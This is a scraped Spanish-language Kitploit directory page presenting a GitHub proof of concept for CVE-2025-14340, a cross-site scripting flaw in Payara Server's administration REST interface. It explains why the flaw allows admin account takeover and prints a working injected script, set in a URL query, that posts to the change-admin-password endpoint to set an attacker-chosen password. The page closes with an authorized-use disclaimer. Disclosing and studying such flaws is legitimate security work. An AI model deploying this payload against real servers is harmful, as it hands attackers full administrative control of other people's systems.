Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14340 — PoC for CVE-2025-14340: Admin account takeover in Payara Server | Kitploit
Herramientas/GitHubGitHub/deepsecurityresearch/cve-2025-14340
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

PoC for CVE-2025-14340: Admin account takeover in Payara Server

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
11hace 4 mesesAún no revisado

XSS para la toma de control de la cuenta de administrador (CVE-2025-14340)

Una vulnerabilidad de Cross-Site Scripting en la interfaz REST de administración de Payara permite la ejecución de JavaScript controlado por el atacante, lo que provoca la toma de control de la cuenta de administrador. Esto se debe a:

  1. El panel utiliza autenticación básica HTTP (las credenciales se envían automáticamente por el navegador para solicitudes del mismo origen).
  2. El endpoint change-admin-password no requiere la contraseña actual para actualizar la contraseña de un usuario.
  3. El formulario change-admin-password no tiene protección CSRF.
  4. Un script inyectado mediante el XSS en /management/domain/version puede hacer POST a /management/domain/change-admin-password y establecer una contraseña elegida por el atacante para cualquier cuenta objetivo, lo que resulta en la toma de control de la cuenta de administrador.

Prueba de concepto

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

PAYLOAD:

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

Aviso legal

SOLO USO AUTORIZADO. DeepSecurity Perú no respalda el acceso no autorizado y no se hace responsable por el mal uso de la información proporcionada.

Descargar herramienta